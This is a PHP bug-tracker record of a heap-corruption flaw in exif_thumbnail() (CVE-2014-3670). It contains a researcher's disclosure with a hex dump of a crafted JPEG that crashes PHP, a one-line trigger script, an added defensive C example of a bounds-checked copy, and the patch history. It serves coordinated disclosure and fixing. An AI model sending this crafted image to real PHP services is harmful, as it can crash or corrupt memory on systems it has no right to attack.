Sec Bug #68113 Heap corruption in exif_thumbnail()
Submitted: 2014-09-28 23:31 UTC Modified: 2014-10-14 17:41 UTC
From: stas@php.net Assigned:
Status: Closed Package: EXIF related
PHP Version: 5.4.33 OS: *
Private report: No CVE-ID: 2014-3670
 [2014-09-28 23:31 UTC] stas@php.net
Description:
------------
Report by Otto Ebeling:
Hi,

I'd like to report a bug that causes heap corruption when parsing
the thumbnail of a specially crafted .jpg image. Could you confirm
that you can repro and provide an estimated timeline for releasing
the fix so we can coordinate this with the HHVM team as HHVM contains
the affected code as well?

Details:
PHP provides APIs such as exif_thumbnail that can be used to extract
embedded thumbnails from various image formats. In the process of
extracting a TIFF-formatted EXIF thumbnail from a JPEG image, PHP
re-encodes most IFD tags present in the thumbnail directory and
prepends them to the thumbnail image in order to produce a standalone
TIFF file. Individual values are re-encoded using the
exif_ifd_make_value function.

If this function is asked to write out an array of floating point
values (single or double precision), it erroneously uses the size
of the whole array when copying individual elements using memmove,
leading to heap corruption.

See:
https://github.com/php/php-src/blob/dbccc8c112e0afaa34db7a913096f849a02da4de/ext/exif/exif.c#L2447
byte_count is the length of the entire array as calculated at
https://github.com/php/php-src/blob/dbccc8c112e0afaa34db7a913096f849a02da4de/ext/exif/exif.c#L2390

In addition to this, the 'from' pointer of the memmove calls points
to the pointer to the array, not its contents. Instead of
&info_data->value.f, the code should be using &info_value->f.

To exploit a target application that uses this API (or exif_read_data with
suitable parameters), a malicious user can trigger this condition by
supplying a tag that contains an array of floating-point values, and
further tags that indicate the presence of a TIFF thumbnail. The image
itself need not be valid as long as the exif_ifd_make_value gets invoked.

Example .jpg file (xxd format) that causes a SIGSEGV on PHP 5.6.0:
0000000: ffd8 ffe1 0050 4578 6966 0000 4949 2a00  .....PExif..II*.
0000010: 1500 0000 ff00 0020 0000 00ff ffff ffff  ....... ........
0000020: 1100 001d 0000 0000 0003 001a 010c 0024  ...............$
0000030: 0000 0017 0000 0001 0204 0001 0000 0040  ...............@
0000040: 0000 0017 0104 0001 0000 0001 0000 0000  ................
0000050: 0000 0000 0000 0000 0000 0000 0000 0000  ................
0000060: 0000 0000 0000 0000 0000 0000 0000 0000  ................
0000070: 0000 0000 0000 0000 0000 0000 0000 0000  ................
0000080: 0000 0000 0000 0000 0000 0000 0000 0000  ................
0000090: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00000a0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00000b0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00000c0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00000d0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00000e0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00000f0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
0000100: 0000 0000 0000 0000 0000 0000 0000 0000  ................
0000110: 0000 0000 0000 0000 0000 0000 0000 0000  ................
0000120: 0000 0000 0000 0000 0000 0000 0000 0000  ................
0000130: 0000 0000 0000 0000 0000 0000 0000 0000  ................
0000140: 0000 0000 0000 0000 0000 0000 0000 0000  ................
0000150: 0000 0000 0000 0000 0000 0000 0000 0000  ................
0000160: 0000 0000 0000 0000 0000 0000 0000 0000  ................

Script:
<?php exif_thumbnail("corrupt_heap.jpg"); ?>

Regards,
Otto Ebeling
Facebook Security Infrastructure
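The report names two defects in the per-element copy: the memmove length is the whole array's byte_count instead of one element's size, and the source is the address of a pointer instead of the element. The following is an added illustration written for this page, not the php-src exif_ifd_make_value() code; the names (pack_value_array, overrun_bytes_of_bug_pattern, ifd_value) and the sample float values are hypothetical. It shows the hardened form of the copy loop, a bounds check that rejects an undersized destination instead of overrunning it, and an arithmetic-only function that reports how far the original pattern would write past an exactly-sized buffer, which is 0 for a single element and (count - 1) * element size otherwise, matching the report's observation that an array is needed to trigger the condition.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>
#include <stdio.h>

/* Simplified model of the EXIF thumbnail value re-encoding that bug #68113
 * describes.  This is added illustration code, not the php-src
 * exif_ifd_make_value() implementation; the names below are hypothetical. */

/* TIFF field type codes for FLOAT and DOUBLE (the two formats the report names). */
enum { FMT_SINGLE = 11, FMT_DOUBLE = 12 };

/* One element of an IFD value array, as the re-encoder sees it. */
typedef union {
    float  f;
    double d;
} ifd_value;

/* Size of a single element for the given format; 0 for formats not modelled here. */
static size_t elem_size(int fmt)
{
    switch (fmt) {
    case FMT_SINGLE: return sizeof(float);
    case FMT_DOUBLE: return sizeof(double);
    default:         return 0;
    }
}

/* Serialise `count` elements of `vals` into `out`.  Both defects from the
 * report are avoided: each memmove copies one element (elem_size), never the
 * total byte_count, and the source is the element itself (&vals[i].f), not
 * the address of a pointer.  The total is checked against out_len before
 * anything is written.  Returns bytes written, or 0 on any error. */
size_t pack_value_array(int fmt, const ifd_value *vals, size_t count,
                        unsigned char *out, size_t out_len)
{
    size_t es = elem_size(fmt);
    if (es == 0 || count == 0 || vals == NULL || out == NULL)
        return 0;
    if (count > SIZE_MAX / es)          /* byte_count would overflow size_t */
        return 0;
    size_t byte_count = count * es;
    if (byte_count > out_len)           /* destination buffer too small */
        return 0;

    for (size_t i = 0; i < count; i++) {
        const void *src = (fmt == FMT_SINGLE) ? (const void *)&vals[i].f
                                              : (const void *)&vals[i].d;
        memmove(out + i * es, src, es); /* es, not byte_count */
    }
    return byte_count;
}

/* Arithmetic only, nothing is copied: how many bytes past the end of a
 * destination of out_len bytes the original pattern
 *     memmove(out + i * es, src, byte_count)   for i = 0 .. count-1
 * would write.  Returns 0 when the pattern is harmless, which is exactly the
 * single-element case where byte_count == es. */
size_t overrun_bytes_of_bug_pattern(int fmt, size_t count, size_t out_len)
{
    size_t es = elem_size(fmt);
    if (es == 0 || count == 0 || count > SIZE_MAX / es)
        return 0;
    size_t byte_count = count * es;
    size_t last_end = (count - 1) * es + byte_count; /* end of the last memmove */
    return last_end > out_len ? last_end - out_len : 0;
}

/* Read element i back out of a packed FLOAT array (memcpy avoids alignment issues). */
float unpack_single(const unsigned char *buf, size_t i)
{
    float v;
    memcpy(&v, buf + i * sizeof(float), sizeof(float));
    return v;
}

/* Round-trip three constructed FLOAT values through an exactly-sized buffer and
 * confirm an undersized buffer is refused.  Returns 1 on success, 0 otherwise. */
int roundtrip_check(void)
{
    ifd_value vals[3];
    vals[0].f = 1.5f; vals[1].f = -2.0f; vals[2].f = 3.25f;   /* constructed sample */
    unsigned char out[3 * sizeof(float)];

    if (pack_value_array(FMT_SINGLE, vals, 3, out, sizeof out) != sizeof out)
        return 0;
    if (unpack_single(out, 0) != 1.5f || unpack_single(out, 1) != -2.0f ||
        unpack_single(out, 2) != 3.25f)
        return 0;
    /* An 8-byte destination cannot hold 12 bytes: must be rejected, not overrun. */
    if (pack_value_array(FMT_SINGLE, vals, 3, out, 8) != 0)
        return 0;
    return 1;
}

int main(void)
{
    printf("round trip ok: %d\n", roundtrip_check());
    printf("bug pattern overrun, 3 floats into 12 bytes: %zu bytes\n",
           overrun_bytes_of_bug_pattern(FMT_SINGLE, 3, 12));
    printf("bug pattern overrun, 1 float into 4 bytes: %zu bytes\n",
           overrun_bytes_of_bug_pattern(FMT_SINGLE, 1, 4));
    return 0;
}
```

The useful check for a reviewer of code like this is that the length passed to each copy is derived from the element type, not from a total computed earlier in the function, and that the total is compared with the destination size before the loop starts; a malformed tag then fails cleanly rather than corrupting the heap.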
Patches

exif-fix (last revision 2014-09-29 00:00 UTC) by stas@php.net


History

 [2014-09-29 00:00 UTC] stas@php.net
The following patch has been added/updated:

Patch Name: exif-fix
Revision:   1411948801
URL:        https://bugs.php.net/patch-display.php?bug=68113&patch=exif-fix&revision=1411948801
 [2014-09-29 05:34 UTC] remi@php.net
-CVE-ID: +CVE-ID: 2014-3670
 [2014-10-14 17:42 UTC] stas@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=287c91c1f060dc85a8bdb51488c50db8614448b7
Log: Fix bug #68113 (Heap corruption in exif_thumbnail())
 [2014-10-14 17:42 UTC] stas@php.net
-Status: Open +Status: Closed
 [2014-10-14 17:44 UTC] stas@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=ddb207e7fa2e9adeba021a1303c3781efda5409b
Log: Fix bug #68113 (Heap corruption in exif_thumbnail())
 [2014-10-14 17:45 UTC] stas@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=f9ba0a157f2d7e6d027285cb2ef964a919e67b8e
Log: Fix bug #68113 (Heap corruption in exif_thumbnail())
 [2014-10-14 17:46 UTC] stas@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=ddb207e7fa2e9adeba021a1303c3781efda5409b
Log: Fix bug #68113 (Heap corruption in exif_thumbnail())
 [2014-10-14 17:53 UTC] stas@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=4a38cc0a3c4db2ac42a5063df0f6ee1ec70b30ff
Log: Fix bug #68113 (Heap corruption in exif_thumbnail())
 [2014-10-14 17:53 UTC] stas@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=f9ba0a157f2d7e6d027285cb2ef964a919e67b8e
Log: Fix bug #68113 (Heap corruption in exif_thumbnail())
 [2014-10-14 17:53 UTC] stas@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=ddb207e7fa2e9adeba021a1303c3781efda5409b
Log: Fix bug #68113 (Heap corruption in exif_thumbnail())
 [2014-10-15 10:10 UTC] ab@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=4a38cc0a3c4db2ac42a5063df0f6ee1ec70b30ff
Log: Fix bug #68113 (Heap corruption in exif_thumbnail())
 [2014-10-15 10:11 UTC] ab@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=f9ba0a157f2d7e6d027285cb2ef964a919e67b8e
Log: Fix bug #68113 (Heap corruption in exif_thumbnail())
 [2014-10-15 10:11 UTC] ab@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=ddb207e7fa2e9adeba021a1303c3781efda5409b
Log: Fix bug #68113 (Heap corruption in exif_thumbnail())
 [2014-10-15 12:08 UTC] jpauli@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=d0a6b7d1242bab3ebd4f1687bfa56b01e6767f67
Log: Fix bug #68113 (Heap corruption in exif_thumbnail())
 [2014-11-03 19:40 UTC] stas@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=287c91c1f060dc85a8bdb51488c50db8614448b7
Log: Fix bug #68113 (Heap corruption in exif_thumbnail())
 [2014-11-18 20:35 UTC] ab@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=287c91c1f060dc85a8bdb51488c50db8614448b7
Log: Fix bug #68113 (Heap corruption in exif_thumbnail())
 [2016-07-20 11:40 UTC] davey@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=4a38cc0a3c4db2ac42a5063df0f6ee1ec70b30ff
Log: Fix bug #68113 (Heap corruption in exif_thumbnail())
 
PHP Copyright © 2001-2017 The PHP Group
All rights reserved.
Last updated: Sun Nov 19 01:31:42 2017 UTC